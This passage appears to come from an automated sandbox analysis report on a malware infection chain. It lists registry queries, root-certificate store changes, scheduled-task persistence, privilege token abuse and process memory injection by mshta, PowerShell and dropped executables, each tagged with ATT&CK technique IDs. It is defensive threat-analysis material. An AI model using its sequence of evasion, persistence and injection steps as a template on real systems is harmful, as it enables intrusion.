Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	y0u3d_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Organizations.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	advnrNo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fontdrvhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	32ae679328.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	laf6w_001.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d91c7611.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	advnrNo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	advnrNo.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe

Delays execution with timeout.exe 3 IoCs

defense_evasion

pid	Process
8428	timeout.exe
10884	timeout.exe
6080	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Kills process with taskkill 6 IoCs

defense_evasion

pid	Process
13924	taskkill.exe
13864	taskkill.exe
3156	taskkill.exe
3356	taskkill.exe
12648	taskkill.exe
14040	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133872805000093494"	chrome.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry

T1112

pid	Process
9076	reg.exe
8832	reg.exe
4760	reg.exe
9220	reg.exe

Modifies system certificate store 2 TTPs 5 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	QL4t9UZ.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	QL4t9UZ.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	QL4t9UZ.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	QL4t9UZ.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	QL4t9UZ.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
7184	schtasks.exe
9312	schtasks.exe
3744	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4584	powershell.exe
4584	powershell.exe
1580	Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
1580	Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
4304	rapes.exe
4304	rapes.exe
1836	Organizations.com
1836	Organizations.com
1836	Organizations.com
1836	Organizations.com
1836	Organizations.com
1836	Organizations.com
6024	advnrNo.exe
6024	advnrNo.exe
6024	advnrNo.exe
6024	advnrNo.exe
4584	MSBuild.exe
4584	MSBuild.exe
4584	MSBuild.exe
4584	MSBuild.exe
6024	advnrNo.exe
6024	advnrNo.exe
380	chrome.exe
380	chrome.exe
4728	powershell.exe
4728	powershell.exe
4728	powershell.exe
1836	Organizations.com
1836	Organizations.com
1836	Organizations.com
1836	Organizations.com
1456	fontdrvhost.exe
1456	fontdrvhost.exe
1456	fontdrvhost.exe
1456	fontdrvhost.exe
6024	advnrNo.exe
6024	advnrNo.exe
4688	MSBuild.exe
4688	MSBuild.exe
4688	MSBuild.exe
4688	MSBuild.exe
6024	advnrNo.exe
6024	advnrNo.exe
6024	advnrNo.exe
6024	advnrNo.exe
6840	powershell.exe
6840	powershell.exe
6840	powershell.exe
6024	advnrNo.exe
6024	advnrNo.exe
1236	rapes.exe
1236	rapes.exe
7312	powershell.exe
7312	powershell.exe
7312	powershell.exe
8072	TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE
8072	TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE
8288	powershell.exe
8288	powershell.exe
8288	powershell.exe
8708	powershell.exe
8708	powershell.exe
8708	powershell.exe
12132	d91c7611.exe

Suspicious behavior: LoadsDriver 7 IoCs

pid	Process
2040	tzutil.exe
660	Process not Found
660	Process not Found
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
672	y0u3d_003.exe
672	y0u3d_003.exe
672	y0u3d_003.exe
10824	laf6w_001.exe
10824	laf6w_001.exe
10824	laf6w_001.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
13012	msedge.exe
13012	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4584	powershell.exe
Token: SeDebugPrivilege	1780	tasklist.exe
Token: SeDebugPrivilege	1656	tasklist.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeDebugPrivilege	4728	powershell.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeLoadDriverPrivilege	2040	tzutil.exe
Token: SeDebugPrivilege	6840	powershell.exe
Token: SeDebugPrivilege	12132	d91c7611.exe
Token: SeBackupPrivilege	12132	d91c7611.exe
Token: SeRestorePrivilege	12132	d91c7611.exe
Token: SeLoadDriverPrivilege	12132	d91c7611.exe
Token: SeShutdownPrivilege	12132	d91c7611.exe
Token: SeSystemEnvironmentPrivilege	12132	d91c7611.exe
Token: SeSecurityPrivilege	12132	d91c7611.exe
Token: SeBackupPrivilege	12132	d91c7611.exe
Token: SeRestorePrivilege	12132	d91c7611.exe
Token: SeDebugPrivilege	12132	d91c7611.exe
Token: SeSystemEnvironmentPrivilege	12132	d91c7611.exe
Token: SeSecurityPrivilege	12132	d91c7611.exe
Token: SeCreatePermanentPrivilege	12132	d91c7611.exe
Token: SeShutdownPrivilege	12132	d91c7611.exe
Token: SeLoadDriverPrivilege	12132	d91c7611.exe
Token: SeIncreaseQuotaPrivilege	12132	d91c7611.exe
Token: SeSecurityPrivilege	12132	d91c7611.exe
Token: SeSystemProfilePrivilege	12132	d91c7611.exe
Token: SeDebugPrivilege	12132	d91c7611.exe
Token: SeMachineAccountPrivilege	12132	d91c7611.exe
Token: SeCreateTokenPrivilege	12132	d91c7611.exe
Token: SeAssignPrimaryTokenPrivilege	12132	d91c7611.exe
Token: SeTcbPrivilege	12132	d91c7611.exe
Token: SeAuditPrivilege	12132	d91c7611.exe
Token: SeSystemEnvironmentPrivilege	12132	d91c7611.exe
Token: SeLoadDriverPrivilege	12132	d91c7611.exe
Token: SeLoadDriverPrivilege	12132	d91c7611.exe
Token: SeIncreaseQuotaPrivilege	12132	d91c7611.exe
Token: SeSecurityPrivilege	12132	d91c7611.exe
Token: SeSystemProfilePrivilege	12132	d91c7611.exe
Token: SeDebugPrivilege	12132	d91c7611.exe
Token: SeMachineAccountPrivilege	12132	d91c7611.exe
Token: SeCreateTokenPrivilege	12132	d91c7611.exe
Token: SeAssignPrimaryTokenPrivilege	12132	d91c7611.exe
Token: SeTcbPrivilege	12132	d91c7611.exe
Token: SeAuditPrivilege	12132	d91c7611.exe
Token: SeSystemEnvironmentPrivilege	12132	d91c7611.exe
Token: SeDebugPrivilege	7312	powershell.exe
Token: SeDebugPrivilege	8288	powershell.exe
Token: SeDebugPrivilege	8708	powershell.exe
Token: SeDebugPrivilege	9028	powershell.exe
Token: SeDebugPrivilege	9460	powershell.exe
Token: SeIncreaseQuotaPrivilege	12132	d91c7611.exe
Token: SeSecurityPrivilege	12132	d91c7611.exe

Suspicious use of FindShellTrayWindow 36 IoCs

pid	Process
6000	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
6000	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
6000	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
1836	Organizations.com
1836	Organizations.com
1836	Organizations.com
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
13012	msedge.exe
3228	32ae679328.exe
3228	32ae679328.exe
3228	32ae679328.exe

Suspicious use of SendNotifyMessage 9 IoCs

pid	Process
6000	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
6000	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
6000	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
1836	Organizations.com
1836	Organizations.com
1836	Organizations.com
3228	32ae679328.exe
3228	32ae679328.exe
3228	32ae679328.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 6000 wrote to memory of 6024	6000	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe	87
PID 6000 wrote to memory of 6024	6000	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe	87
PID 6000 wrote to memory of 6024	6000	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe	87
PID 6000 wrote to memory of 5096	6000	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe	88
PID 6000 wrote to memory of 5096	6000	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe	88
PID 6000 wrote to memory of 5096	6000	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe	88
PID 6024 wrote to memory of 3744	6024	cmd.exe	90
PID 6024 wrote to memory of 3744	6024	cmd.exe	90
PID 6024 wrote to memory of 3744	6024	cmd.exe	90
PID 5096 wrote to memory of 4584	5096	mshta.exe	92
PID 5096 wrote to memory of 4584	5096	mshta.exe	92
PID 5096 wrote to memory of 4584	5096	mshta.exe	92
PID 4584 wrote to memory of 1580	4584	powershell.exe	98
PID 4584 wrote to memory of 1580	4584	powershell.exe	98
PID 4584 wrote to memory of 1580	4584	powershell.exe	98
PID 1580 wrote to memory of 4304	1580	Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE	102
PID 1580 wrote to memory of 4304	1580	Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE	102
